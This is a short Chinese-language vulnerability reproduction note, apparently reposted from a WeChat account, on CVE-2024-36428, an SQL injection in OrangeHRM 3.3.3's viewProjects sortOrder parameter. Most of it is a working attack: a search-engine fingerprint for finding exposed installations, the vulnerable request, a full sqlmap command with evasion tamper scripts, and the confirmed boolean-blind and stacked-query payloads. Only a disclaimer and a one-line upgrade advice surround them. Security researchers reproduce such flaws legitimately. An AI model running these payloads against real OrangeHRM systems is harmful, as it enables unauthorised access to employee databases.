免责申明:本文内容为学习笔记分享,仅供技术学习参考,请勿用作违法用途,任何个人和组织利用此文所提供的信息而造成的直接或间接后果和损失,均由使用者本人负责,与作者无关!!!
01
—
漏洞名称
OrangeHRM SQL 注入漏洞
02
—
漏洞影响
OrangeHRM 3.3.3
靶场下载地址
https://sourceforge.net/projects/orangehrm/files/stable/3.3.3/
03
—
漏洞描述
OrangeHRM 3.3.3 allows admin/viewProjects sortOrder SQL injection.
04
—
app="OrangeHRM-产品"
05
—
漏洞复现
向靶场发送如下数据包
URL: https://$HOST/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC
sqlmap运行
python3 sqlmap.py -r sqli --force-ssl --level 5 --risk 3 --random-agent --tamper between,charencode --dbms mysql --ignore-redirects --technique BS --flush-session --batch --current-user --string="Found"
sqlmap payload
Parameter: #1* (URI)
Type: boolean-based blind
Title: MySQL >= 5.0 boolean-based blind - ORDER BY, GROUP BY clause
Payload: https://192.168.1.28/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC,(SELECT (CASE WHEN (5240=5240) THEN 1 ELSE 5240*(SELECT 5240 FROM INFORMATION_SCHEMA.PLUGINS) END))
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: https://192.168.1.28/symfony/web/index.php/admin/viewProjects?sortField=customerName&sortOrder=ASC;SELECT SLEEP(5)#
漏洞复现成功
06
—
修复建议
升级到最新版本。开源项目可以自己动手改。
原文始发于微信公众号(AI与网安):CVE-2024-36428 漏洞复现
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论